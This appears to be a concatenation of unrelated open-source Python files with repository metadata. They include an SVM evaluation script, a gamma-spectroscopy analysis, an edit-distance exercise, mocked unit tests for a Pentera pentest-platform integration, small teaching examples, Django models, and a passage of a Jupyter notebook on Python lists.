[ "Apache-2.0" ]
24
2021-10-15T08:32:45.000Z
2022-03-24T18:45:20.000Z
# Copyright 2021 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """verify by svm""" import time import argparse import numpy as np from mindspore import context from sklearn import svm from sklearn.preprocessing import StandardScaler def verify_cifar10(): """ verify on cifar10 dataset """ label_path_train = "./preprocess_Result/cifar10_label_ids_train.npy" label_path_test = "./preprocess_Result/cifar10_label_ids_test.npy" label_set_train = np.load(label_path_train, allow_pickle=True) label_set_test = np.load(label_path_test, allow_pickle=True) result_set_train = [] for i in range(0, 500): result_file_train = './result_Files_train/dcgan_data_bs100_' + str(i) + "_train_0.bin" result = np.fromfile(result_file_train, dtype=np.float32).reshape(-1, 14336) result_set_train.append(result) result_set_train = np.array(result_set_train) result_set_train = result_set_train.reshape(-1, 14336) label_set_train = label_set_train.reshape(-1, 1) label_set_train = label_set_train.flatten() result_set_test = [] for i in range(0, 100): result_file_test = './result_Files_test/dcgan_data_bs100_' + str(i) + "_test_0.bin" result = np.fromfile(result_file_test, dtype=np.float32).reshape(-1, 14336) result_set_test.append(result) result_set_test = np.array(result_set_test) result_set_test = result_set_test.reshape(-1, 14336) label_set_test = label_set_test.reshape(-1, 1) label_set_test = label_set_test.flatten() print("result_set_train.shape: ", result_set_train.shape) print("label_set_train.shape: ", label_set_train.shape) print("result_set_test.shape: ", result_set_test.shape) print("label_set_test.shape: ", label_set_test.shape) print("============================standradScaler") standardScaler = StandardScaler() standardScaler.fit(result_set_train) result_set_train_standard = standardScaler.transform(result_set_train) standardScaler.fit(result_set_test) result_set_test_standard = standardScaler.transform(result_set_test) print("============================training") clf = svm.SVC(max_iter=-1) start = time.time() print("result_set_train.shape: ", result_set_train_standard.shape) print("label_set_train.shape: ", label_set_train.shape) clf.fit(result_set_train_standard, label_set_train) t = time.time() - start print("train time:", t) print("============================testing") # Test on Training data print("result_set_test.shape: ", result_set_test_standard.shape) print("label_set_test.shape: ", label_set_test.shape) test_result = clf.predict(result_set_test_standard) accuracy = sum(test_result == label_set_test) / label_set_test.shape[0] print('Test accuracy: ', accuracy) if __name__ == '__main__': parser = argparse.ArgumentParser(description='image production training') parser.add_argument('--device_target', type=str, default='Ascend', choices=('Ascend', 'GPU'), help='device where the code will be implemented (default: Ascend)') parser.add_argument('--device_id', type=int, default=0, help='device id of GPU or Ascend. (Default: 0)') args = parser.parse_args() device_target = args.device_target device_id = args.device_id context.set_context(mode=context.GRAPH_MODE, device_target=device_target, save_graphs=False, device_id=device_id) print("============================verify_cifar10") verify_cifar10()
41.818182
117
0.7
935fec1ff1cb0ca01485e176912022487eea1a96
4,960
py
Python
Fortgeschrittenenpraktikum/Protokolle/V18_Germaniumdetektor/Python/unbekannt2.py
smjhnits/Praktikum
92c9df3ee7dfa2417f464036d18ac33b70765fdd
[ "MIT" ]
2
2019-03-07T08:55:36.000Z
2019-04-22T18:13:03.000Z
Fortgeschrittenenpraktikum/Protokolle/V18_Germaniumdetektor/Python/unbekannt2.py
smjhnits/Praktikum
92c9df3ee7dfa2417f464036d18ac33b70765fdd
[ "MIT" ]
null
null
null
Fortgeschrittenenpraktikum/Protokolle/V18_Germaniumdetektor/Python/unbekannt2.py
smjhnits/Praktikum
92c9df3ee7dfa2417f464036d18ac33b70765fdd
[ "MIT" ]
2
2017-10-27T13:26:43.000Z
2018-01-13T09:12:24.000Z
import numpy as np import matplotlib.pyplot as plt import uncertainties from scipy.signal import find_peaks from scipy.optimize import curve_fit import scipy.constants as sc import scipy.integrate as integrate from uncertainties import ufloat from uncertainties import unumpy as unp from uncertainties.unumpy import nominal_values as nomval from uncertainties.unumpy import std_devs as std # Loading experimental data and results of further calculations r = 0.5*45*10**(-3) L = (73.5+15)*10**(-3) Omega = 0.5 * ( 1- L/np.sqrt(L**2+r**2)) C_u2 = np.genfromtxt('2018-12-10_Nitschke_Pape/Probe_21.Spe', unpack = True) Peaks_Eu, Q_Eu = np.genfromtxt('EuropiumQ.txt', unpack = True) Channels = np.linspace(0,len(C_u2[:4000])-1, len(C_u2[:4000])) params_energy, covariance_energy_0, covariance_energy_1, params_Q, covariance_Q_0, covariance_Q_1= np.genfromtxt('Europium.txt', unpack = True) covariance_energy = np.array([covariance_energy_0, covariance_energy_1]) errors_energy = np.sqrt(np.diag(covariance_energy)) covariance_Q = np.array([covariance_Q_0,covariance_Q_1]) errors_Q = np.sqrt(np.diag(covariance_Q)) def Energy(C): return ufloat(params_energy[0], errors_energy[0])*C + ufloat(params_energy[1], errors_energy[1]) def Gauss(x, A, xmu, sigma, B): return A * np.exp(-0.5*(x-xmu)**2/sigma**2) + B def Gauss_Ufloat(x, A, xmu, sigma): return A * unp.exp(-0.5*(x-xmu)**2/sigma**2) def AreaGaus(A, sigma): return np.sqrt(2*np.pi)*sigma*A def Efficiency(E): return ufloat(params_Q[0], errors_Q[0])*E**ufloat(params_Q[1], errors_Q[1]) Spektrum = C_u2[:4000] tges = 4046 Peaks = find_peaks(Spektrum, height = 120) plt.clf() plt.hist(unp.nominal_values(Energy(np.arange(0, len(Spektrum[0:4000]), 1))), bins=unp.nominal_values(Energy(np.linspace(0, len(Spektrum[0:4000]), len(Spektrum[0:4000])))), weights=Spektrum[0:4000], label='Spektrum') plt.yscale('log') plt.plot(nomval(Energy(Peaks[0][:])), Spektrum[Peaks[0][:]], '.', markersize=4, label='Gauß-Peaks', color='C1', alpha=0.8) plt.xlim(0,1500) plt.ylabel('Zählungen pro Energie') plt.xlabel('E / keV') plt.legend() #plt.show() plt.savefig('Plots/unbekannt2.pdf') Peaks_Energy = Energy(Peaks[0][:]) Energy_co = np.array([1173.237, 1332.501]) Params_u2 = [] errors_u2 = [] for n in Peaks[0]: Params, covariance = curve_fit(Gauss, Channels[n-30:n+30], Spektrum[n-30:n+30], p0 = [C_u2[n], n, 1, 0]) Params_u2.append(Params.tolist()) errors = np.sqrt(np.diag(covariance)) errors_u2.append(errors.tolist()) for i,n in enumerate(Peaks[0]): l_u = np.int(Channels[n-30]) l_o = np.int(Channels[n+30]) plt.clf() plt.hist(unp.nominal_values(Energy(np.arange(l_u, l_o, 1))), bins=unp.nominal_values(Energy(np.linspace(l_u, l_o, len(Spektrum[n-30:n+30])))), weights=Spektrum[n-30:n+30], label='Spektrum') Channel_Gauss = np.linspace(n-30,n+30,1000) plt.plot(unp.nominal_values(Energy(Channel_Gauss)), Gauss(Channel_Gauss,*Params_u2[i])) #plt.show() Peaks_mittel = np.round(np.asarray(Params_u2)[:,1],0) Amplitudes = np.asarray(Params_u2)[:,0] Amplitudes_ufloat = np.asarray([ufloat(n, np.asarray(errors_u2)[i,0]) for i,n in enumerate(np.asarray(Params_u2)[:,0])]) Means_ufloat = np.asarray([ufloat(n, np.asarray(errors_u2)[i,1]) for i,n in enumerate(np.asarray(Params_u2)[:,1])]) sigmas = np.asarray(Params_u2)[:,2] sigmas_ufloat = np.asarray([ufloat(n, np.asarray(errors_u2)[i,2]) for i,n in enumerate(np.asarray(Params_u2)[:,2])]) Area_Params = np.array([[n,sigmas[i]] for i,n in enumerate(Amplitudes)]) Area_params_ufloat = np.array([[n,sigmas_ufloat[i]] for i,n in enumerate(Amplitudes_ufloat)]) Constants_ufloat = np.asarray([ufloat(n, np.asarray(errors_u2)[i,3]) for i,n in enumerate(np.asarray(Params_u2)[:,3])]) print("--- Find Peaks and gaussian fit---") print(f"Channel Peaks: {np.round(Peaks_mittel,0)}") #print(f"Energy Peaks: {Energy(np.round(Peaks_mittel,0))}") print(f"Energy Literature: {Energy_co}", '\n') Area = AreaGaus(Area_Params[:,0], Area_Params[:,1]) Area_ufloat = AreaGaus(Area_params_ufloat[:,0], Area_params_ufloat[:,1]) Area_norm = Area/tges Area_norm_ufloat = Area_ufloat/tges print("-- Fit Parameter --") print(f"Amplituden: {Amplitudes_ufloat}") print(f"Means: {Energy(Means_ufloat)}") print(f"Sigmas: {sigmas_ufloat}") print(f"Constants: {Constants_ufloat}", '\n') print("--- Calculating the activity ---") r = 0.5*45*10**(-3) L = (73.5+15)*10**(-3) Omega = 0.5 * ( 1- L/np.sqrt(L**2+r**2)) W = np.asarray([0.999736, 0.999856]) Q = Efficiency(Peaks_Energy) Aktivität = np.array([Area_norm[i]/(W[i]*n*Omega) for i,n in enumerate(Q)]) print(f"emission probability: {W}") print(f"Area under Gaussian Fit: {Area_ufloat}") print(f"Efficiency: {Q}", '\n') print(f"resulting acitivity: {Aktivität}") A_all = sum(Aktivität)/len(Aktivität)#ufloat(np.mean(nomval(Aktivität)),np.std(std(Aktivität))) print(f"Mean with all values: {nomval(A_all)}, {std(A_all)}")
38.75
143
0.703831
35813f5601c81a9ccc7791e5578db64b1a5ddd91
1,684
py
Python
Python/zzz_training_challenge/Python_Challenge/solutions/ch07_recursion_advanced/solutions/ex02_edit_distance_memo_decorated.py
Kreijeck/learning
eaffee08e61f2a34e01eb8f9f04519aac633f48c
[ "MIT" ]
null
null
null
Python/zzz_training_challenge/Python_Challenge/solutions/ch07_recursion_advanced/solutions/ex02_edit_distance_memo_decorated.py
Kreijeck/learning
eaffee08e61f2a34e01eb8f9f04519aac633f48c
[ "MIT" ]
null
null
null
Python/zzz_training_challenge/Python_Challenge/solutions/ch07_recursion_advanced/solutions/ex02_edit_distance_memo_decorated.py
Kreijeck/learning
eaffee08e61f2a34e01eb8f9f04519aac633f48c
[ "MIT" ]
null
null
null
# Beispielprogramm für das Buch "Python Challenge" # # Copyright 2020 by Michael Inden from ch07_recursion_advanced.intro.decorator_utils import decorate_with_memo_shorter def edit_distance(str1, str2): return __edit_distance_helper(str1.lower(), str2.lower(), len(str1) - 1, len(str2) - 1) @decorate_with_memo_shorter def __edit_distance_helper(str1, str2, pos1, pos2): # rekursiver Abbruch # wenn einer der Strings am Anfang ist und der andere # noch nicht, dann nimm die Länge des verbliebenen Strings if pos1 <= 0: return pos2 if pos2 <= 0: return pos1 # Prüfe, ob die Zeichen übereinstimmen und dann auf zum nächsten if str1[pos1] == str2[pos2]: # rekursiver Abstieg return __edit_distance_helper(str1, str2, pos1 - 1, pos2 - 1) else: # prüfe auf insert, delete, change insert_in_first = __edit_distance_helper(str1, str2, pos1, pos2 - 1) delete_in_first = __edit_distance_helper(str1, str2, pos1 - 1, pos2) change = __edit_distance_helper(str1, str2, pos1 - 1, pos2 - 1) # Minimum aus allen drei Varianten + 1 return 1 + min(insert_in_first, delete_in_first, change) def main(): inputs_tuples = [("Micha", "Michael"), ("Ananas", "Banane"), ("sunday-Night-Mic", "saturday-Morning-Mi"), ("sunday-Night-Mike", "saturday-Morning-Micha")] print("With memoization") for inputs in inputs_tuples: print(inputs[0], " -> ", inputs[1], " edits: ", str(edit_distance(inputs[0], inputs[1]))) if __name__ == "__main__": main()
31.773585
84
0.630641
35a7447d0590910a82fcc439dcd665a03532eabe
6,911
py
Python
Packs/Pcysys/Integrations/Pcysys/Pcysys_test.py
diCagri/content
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
[ "MIT" ]
799
2016-08-02T06:43:14.000Z
2022-03-31T11:10:11.000Z
Packs/Pcysys/Integrations/Pcysys/Pcysys_test.py
diCagri/content
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
[ "MIT" ]
9,317
2016-08-07T19:00:51.000Z
2022-03-31T21:56:04.000Z
Packs/Pcysys/Integrations/Pcysys/Pcysys_test.py
diCagri/content
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
[ "MIT" ]
1,297
2016-08-04T13:59:00.000Z
2022-03-31T23:43:06.000Z
import demistomock as demisto import jwt from Pcysys import Client, pentera_run_template_command, pentera_get_task_run_status_command, \ pentera_get_task_run_full_action_report_command, pentera_authentication MOCK_PENTERA_FULL_ACTION_REPORT = 'penterascan-5e4530961deb8eda82b08730.csv' MOCK_CSV = open('TestData/mock_csv_file', 'r').read() MOCK_AUTHENTICATION = { "token": "TOKEN", "tgt": "TGT" } MOCK_AUTHENTICATION_EXP = 1579763364 MOCK_RUN_TEMPLATE = { "taskRuns": [ { "status": "Running", "taskRunId": "5e41923cf24e1f99979b1cb4", "taskRunName": "Test mock task run name", "startTime": 1581348380358.0, "endTime": 1581349123973.0, } ], } MOCK_TASK_RUN_STATS = { "taskRuns": [ { "taskRunId": "5e41923cf24e1f99979b1cb4", "taskRunName": "Test mock task run name", "startTime": 1581348380358.0, "endTime": 1581349123973.0, "status": "Warning" } ] } def test_pentera_get_task_run_full_action_report(mocker, requests_mock): mocker.patch.object(demisto, 'params', return_value={ 'url': 'https://pentera.com', 'port': '8181' }) mocker.patch.object(demisto, 'getIntegrationContext', return_value={ 'base_url': 'https://pentera.com', 'tgt': 'omgNewTGT', 'accessToken': 'omgNewSecret', 'expiry': MOCK_AUTHENTICATION_EXP }) mocker.patch.object(demisto, 'args', return_value={ 'task_run_id': '5e4530961deb8eda82b08730' }) requests_mock.get('https://pentera.com:8181/api/v1/taskRun/5e4530961deb8eda82b08730/fullActionReportCSV', text=MOCK_CSV) client_id = demisto.params().get('clientId') tgt = demisto.params().get('tgt') base_url = demisto.params()['url'].rstrip('/') + ':' + demisto.params()['port'] verify_certificate = not demisto.params().get('insecure', False) proxy = demisto.params().get('proxy', False) args = demisto.args() client = Client( base_url=base_url, tgt=tgt, verify=verify_certificate, client_id=client_id, proxy=proxy, headers={'Accept': 'application/json'}) entries = pentera_get_task_run_full_action_report_command(client, args) raw_csv_file_name = entries[0]['File'] assert raw_csv_file_name == MOCK_PENTERA_FULL_ACTION_REPORT task_run_id = entries[1]['EntryContext']['Pentera.TaskRun(val.ID == obj.ID)']['ID'] assert task_run_id == '5e4530961deb8eda82b08730' operation_type = entries[1]['EntryContext']['Pentera.TaskRun(val.ID == obj.ID)']['FullActionReport'][0][ 'Operation Type'] assert operation_type == 'BlueKeep (CVE-2019-0708) Vulnerability Discovery' def test_pentera_get_task_run_stats(mocker, requests_mock): mocker.patch.object(demisto, 'params', return_value={ 'url': 'https://pentera.com', 'port': '8181' }) mocker.patch.object(demisto, 'getIntegrationContext', return_value={ 'base_url': 'https://pentera.com', 'tgt': 'omgNewTGT', 'accessToken': 'omgNewSecret', 'expiry': MOCK_AUTHENTICATION_EXP }) mocker.patch.object(demisto, 'args', return_value={ 'task_run_id': '5e41923cf24e1f99979b1cb4' }) requests_mock.get('https://pentera.com:8181/api/v1/taskRun/5e41923cf24e1f99979b1cb4', json=MOCK_RUN_TEMPLATE) client_id = demisto.params().get('clientId') tgt = demisto.params().get('tgt') base_url = demisto.params()['url'].rstrip('/') + ':' + demisto.params()['port'] verify_certificate = not demisto.params().get('insecure', False) proxy = demisto.params().get('proxy', False) args = demisto.args() client = Client( base_url=base_url, tgt=tgt, verify=verify_certificate, client_id=client_id, proxy=proxy, headers={'Accept': 'application/json'}) readable, parsed, raw = pentera_get_task_run_status_command(client, args) assert parsed['Pentera.TaskRun(val.ID == obj.ID)']['ID'] == MOCK_TASK_RUN_STATS['taskRuns'][0]['taskRunId'] def test_pentera_run_template(mocker, requests_mock): mocker.patch.object(demisto, 'params', return_value={ 'url': 'https://pentera.com', 'port': '8181' }) mocker.patch.object(demisto, 'getIntegrationContext', return_value={ 'base_url': 'https://pentera.com', 'tgt': 'omgNewTGT', 'accessToken': 'omgNewSecret', 'expiry': MOCK_AUTHENTICATION_EXP }) mocker.patch.object(demisto, 'args', return_value={ 'template_name': 'omgRunThisTemplate' }) requests_mock.post('https://pentera.com:8181/api/v1/template/runBulk', json=MOCK_RUN_TEMPLATE) client_id = demisto.params().get('clientId') tgt = demisto.params().get('tgt') base_url = demisto.params()['url'].rstrip('/') + ':' + demisto.params()['port'] verify_certificate = not demisto.params().get('insecure', False) proxy = demisto.params().get('proxy', False) args = demisto.args() client = Client( base_url=base_url, tgt=tgt, verify=verify_certificate, client_id=client_id, proxy=proxy, headers={'Accept': 'application/json'}) readable, parsed, raw = pentera_run_template_command(client, args) assert parsed['Pentera.TaskRun(val.ID == obj.ID)']['Status'] == MOCK_RUN_TEMPLATE['taskRuns'][0]['status'] def test_pentera_authentication(mocker, requests_mock): mocker.patch.object(demisto, 'params', return_value={ 'clientId': 'mmtzv', 'tgt': 'omgSecretsWow', 'url': 'https://pentera.com', 'port': '8181' }) mocker.patch.object(jwt, 'get_unverified_header', return_value={'alg': 'HS256', 'exp': 1579763364, 'iat': 1579762464}) requests_mock.post('https://pentera.com:8181/auth/token', json=MOCK_AUTHENTICATION) mocker.patch.object(demisto, 'args', return_value={}) mocker.patch.object(demisto, 'setIntegrationContext') client_id = demisto.params().get('clientId') tgt = demisto.params().get('tgt') base_url = demisto.params()['url'].rstrip('/') + ':' + demisto.params()['port'] verify_certificate = not demisto.params().get('insecure', False) proxy = demisto.params().get('proxy', False) client = Client( base_url=base_url, tgt=tgt, verify=verify_certificate, client_id=client_id, proxy=proxy, headers={'Accept': 'application/json'}) pentera_authentication(client) assert demisto.setIntegrationContext.call_count == 1 integration_context = demisto.setIntegrationContext.call_args[0][0] assert isinstance(integration_context, dict) assert integration_context['expiry'] == MOCK_AUTHENTICATION_EXP assert integration_context['accessToken'] == MOCK_AUTHENTICATION['token']
39.045198
111
0.653017
ea220d728ed62d821c3fbebff00c689b1425b5f7
728
py
Python
IVTa/2014/SHCHUKIN_F_O/task_3_30.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
1
2021-04-02T17:43:48.000Z
2021-04-02T17:43:48.000Z
IVTa/2014/SHCHUKIN_F_O/task_3_30.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
IVTa/2014/SHCHUKIN_F_O/task_3_30.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
1
2020-12-18T18:04:49.000Z
2020-12-18T18:04:49.000Z
# Задача 1. Вариант 30. ''' Напишите программу, которая выводит имя "Илья Арнольдович Файзильберг", и запрашивает его псевдоним. Программа должна сцеплять две эти строки и выводить полученную строку, разделяя имя и псевдоним с помощью тире. ''' # SHCHUKIN F. O. # 24.02.2016 from sys import stdout as c from time import sleep name = 'Илья Арнольдович Файнзильберг' question = 'Какой псевдоним носил советский писатель ' + name + '?' sleep(1.0) def printer(text): for char in text: c.write(char) c.flush() pause = 0.03 sleep(pause) printer(question) c.write('\n'*2) answer = input('Ваш ответ: ') c.write('\n'*2) printer('Правильно: ' + name + ' - ' + answer) c.write('\n'*2) input('ok')
22.060606
71
0.673077
17f132d4e7c624ad4fa893494275758b3a8be675
1,012
py
Python
S6/CS334-NPL/003c_shared_memory (005c).py
joe247/CSE-LABS
bab17548562bdc9c0bc8b15679f07379a9e98dec
[ "MIT" ]
2
2021-02-03T02:03:21.000Z
2021-07-03T20:24:14.000Z
S6/CS334-NPL/003c_shared_memory (005c).py
joe247/CSE-LABS
bab17548562bdc9c0bc8b15679f07379a9e98dec
[ "MIT" ]
null
null
null
S6/CS334-NPL/003c_shared_memory (005c).py
joe247/CSE-LABS
bab17548562bdc9c0bc8b15679f07379a9e98dec
[ "MIT" ]
null
null
null
import multiprocessing def square_list(mylist, result, square_sum): """ function to square a given list """ # append squares of mylist to result array for idx, num in enumerate(mylist): result[idx] = num * num # square_sum value square_sum.value = sum(result) # print result Array print(f'Result (in process p1): {result[:]}') # print square_sum Value print(f'Sum of squares (in process p1): {square_sum.value}') if __name__ == "__main__": # input list mylist = [1,2,3,4] # creating Array of int data type with space for 4 integers result = multiprocessing.Array('i', 4) # creating Value of int data type square_sum = multiprocessing.Value('i') # creating new process p1 = multiprocessing.Process(target=square_list, args=(mylist, result, square_sum)) # starting process p1.start() # wait until process is finished p1.join() # print result array print(f'Result (in main process): {result[:]}') # print square_sum Value print(f'Sum of squares (in main process): {square_sum.value}')
30.666667
84
0.718379
101e8f19fec5996b4135ab21dd8ee960a387292b
829
py
Python
FUNDASTORE/APPS/PRODUCTOS/models.py
GabrielB-07/FundaStore-cgb
b509a9743a651344b32dd7a40ab789f1db48e54b
[ "CC0-1.0" ]
null
null
null
FUNDASTORE/APPS/PRODUCTOS/models.py
GabrielB-07/FundaStore-cgb
b509a9743a651344b32dd7a40ab789f1db48e54b
[ "CC0-1.0" ]
null
null
null
FUNDASTORE/APPS/PRODUCTOS/models.py
GabrielB-07/FundaStore-cgb
b509a9743a651344b32dd7a40ab789f1db48e54b
[ "CC0-1.0" ]
null
null
null
from django.db import models # Create your models here. class Categoria(models.Model): cat_id = models.AutoField(primary_key=True) cat_nombre = models.CharField(max_length=128) cat_itbms = models.DecimalField(max_digits=8,decimal_places=2) def __str__(self): return self.cat_nombre class Producto(models.Model): pro_id = models.AutoField(primary_key=True) pro_nombre = models.CharField(max_length=128) pro_precio = models.DecimalField(max_digits=8,decimal_places=2) pro_stock = models.IntegerField() pro_descripcion = models.TextField(null=True) pro_categoria = models.ForeignKey(to=Categoria,on_delete=models.CASCADE,null=True) pro_imagen = models.ImageField(upload_to='PRODUCTOS',max_length=128,default='default.png') def __str__(self): return self.pro_nombre
37.681818
94
0.75392
102b53d41bd2daccf298fd33e72a775ec553f087
10,181
py
Python
Python X/Lists.py
nirobio/puzzles
fda8c84d8eefd93b40594636fb9b7f0fde02b014
[ "MIT" ]
null
null
null
Python X/Lists.py
nirobio/puzzles
fda8c84d8eefd93b40594636fb9b7f0fde02b014
[ "MIT" ]
null
null
null
Python X/Lists.py
nirobio/puzzles
fda8c84d8eefd93b40594636fb9b7f0fde02b014
[ "MIT" ]
null
null
null
{ "cells": [ { "cell_type": "code", "execution_count": 1, "metadata": {}, "outputs": [], "source": [ "# lists are used to store a list of things; similar to arrays in java \n", "# note the use of square brackets and\n", "\n", "a = [3, 10, -1]" ] }, { "cell_type": "code", "execution_count": 2, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "[3, 10, -1]\n" ] } ], "source": [ "print(a)" ] }, { "cell_type": "code", "execution_count": 5, "metadata": {}, "outputs": [], "source": [ "# .append function adds your number to the list\n", "\n", "a.append(2)" ] }, { "cell_type": "code", "execution_count": 6, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "[3, 10, -1, 2, 2]\n" ] } ], "source": [ "print(a)" ] }, { "cell_type": "code", "execution_count": 7, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "[3, 10, -1, 2, 2, 'yayay']\n" ] } ], "source": [ "# list can contain numbers, text or other lists\n", "\n", "a.append(\"yayay\")\n", "print(a)" ] }, { "cell_type": "code", "execution_count": 8, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "[3, 10, -1, 2, 2, 'yayay', [6, 7]]\n" ] } ], "source": [ "a.append([6, 7])\n", "print(a)" ] }, { "cell_type": "code", "execution_count": 9, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "[6, 7]" ] }, "execution_count": 9, "metadata": {}, "output_type": "execute_result" } ], "source": [ "a.pop()" ] }, { "cell_type": "code", "execution_count": 10, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "[3, 10, -1, 2, 2, 'yayay']\n" ] } ], "source": [ "print(a)" ] }, { "cell_type": "code", "execution_count": 11, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "'yayay'" ] }, "execution_count": 11, "metadata": {}, "output_type": "execute_result" } ], "source": [ "a.pop()" ] }, { "cell_type": "code", "execution_count": 12, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "[3, 10, -1, 2, 2]\n" ] } ], "source": [ "print(a)" ] }, { "cell_type": "code", "execution_count": 13, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "3" ] }, "execution_count": 13, "metadata": {}, "output_type": "execute_result" } ], "source": [ "a[0]" ] }, { "cell_type": "code", "execution_count": 14, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "2" ] }, "execution_count": 14, "metadata": {}, "output_type": "execute_result" } ], "source": [ "a[3]" ] }, { "cell_type": "code", "execution_count": 15, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "-1" ] }, "execution_count": 15, "metadata": {}, "output_type": "execute_result" } ], "source": [ "a[2]\n" ] }, { "cell_type": "code", "execution_count": 16, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "-1\n" ] } ], "source": [ "print(a[2])" ] }, { "cell_type": "code", "execution_count": 17, "metadata": {}, "outputs": [], "source": [ "a[0] = 4.55" ] }, { "cell_type": "code", "execution_count": 18, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "[4.55, 10, -1, 2, 2]\n" ] } ], "source": [ "print(a)" ] }, { "cell_type": "code", "execution_count": 19, "metadata": {}, "outputs": [], "source": [ "b = [\"banana\", \"apple\", \"microsoft\"]" ] }, { "cell_type": "code", "execution_count": 20, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "['banana', 'apple', 'microsoft']\n" ] } ], "source": [ "print(b)" ] }, { "cell_type": "code", "execution_count": 21, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "'banana'" ] }, "execution_count": 21, "metadata": {}, "output_type": "execute_result" } ], "source": [ "b[0]" ] }, { "cell_type": "code", "execution_count": 22, "metadata": {}, "outputs": [ { "ename": "NameError", "evalue": "name 'temp' is not defined", "output_type": "error", "traceback": [ "\u001b[0;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[0;31mNameError\u001b[0m Traceback (most recent call last)", "\u001b[0;32m<ipython-input-22-bb6d55739a6c>\u001b[0m in \u001b[0;36m<module>\u001b[0;34m\u001b[0m\n\u001b[0;32m----> 1\u001b[0;31m \u001b[0mb\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0;36m0\u001b[0m\u001b[0;34m]\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mtemp\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m\u001b[1;32m 2\u001b[0m \u001b[0mb\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0;36m0\u001b[0m\u001b[0;34m]\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mb\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0;36m2\u001b[0m\u001b[0;34m]\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[1;32m 3\u001b[0m \u001b[0mb\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0;36m2\u001b[0m\u001b[0;34m]\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mtemp\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n", "\u001b[0;31mNameError\u001b[0m: name 'temp' is not defined" ] } ], "source": [ "b[0] = temp\n", "b[0] = b[2]\n", "b[2] = temp" ] }, { "cell_type": "code", "execution_count": 23, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "'microsoft'" ] }, "execution_count": 23, "metadata": {}, "output_type": "execute_result" } ], "source": [ "b[0]\n", "b[2]" ] }, { "cell_type": "code", "execution_count": 24, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "'banana'" ] }, "execution_count": 24, "metadata": {}, "output_type": "execute_result" } ], "source": [ "b[0]" ] }, { "cell_type": "code", "execution_count": 25, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "'microsoft'" ] }, "execution_count": 25, "metadata": {}, "output_type": "execute_result" } ], "source": [ "b[0]\n", "b[2]" ] }, { "cell_type": "code", "execution_count": 26, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "banana\n", "microsoft\n" ] } ], "source": [ "print(b[0])\n", "print(b[2])" ] }, { "cell_type": "code", "execution_count": 27, "metadata": {}, "outputs": [ { "ename": "NameError", "evalue": "name 'temp' is not defined", "output_type": "error", "traceback": [ "\u001b[0;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[0;31mNameError\u001b[0m Traceback (most recent call last)", "\u001b[0;32m<ipython-input-27-af3436a9262b>\u001b[0m in \u001b[0;36m<module>\u001b[0;34m\u001b[0m\n\u001b[0;32m----> 1\u001b[0;31m \u001b[0mb\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0;36m0\u001b[0m\u001b[0;34m]\u001b[0m \u001b[0;34m=\u001b[0m \u001b[0mtemp\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m", "\u001b[0;31mNameError\u001b[0m: name 'temp' is not defined" ] } ], "source": [ "b[0] = temp" ] }, { "cell_type": "code", "execution_count": 28, "metadata": {}, "outputs": [], "source": [ "temp = b[0]" ] }, { "cell_type": "code", "execution_count": 29, "metadata": {}, "outputs": [], "source": [ "b[0] = b[2]\n", "b[2] = temp" ] }, { "cell_type": "code", "execution_count": 30, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "microsoft\n", "banana\n" ] } ], "source": [ "print(b[0])\n", "print(b[2])" ] }, { "cell_type": "code", "execution_count": 31, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "['microsoft', 'apple', 'banana']\n" ] } ], "source": [ "print(b)" ] }, { "cell_type": "code", "execution_count": 32, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "['banana', 'apple', 'microsoft']\n" ] } ], "source": [ "b[0], b[2] = b[2], b[0]\n", "print(b)" ] }, { "cell_type": 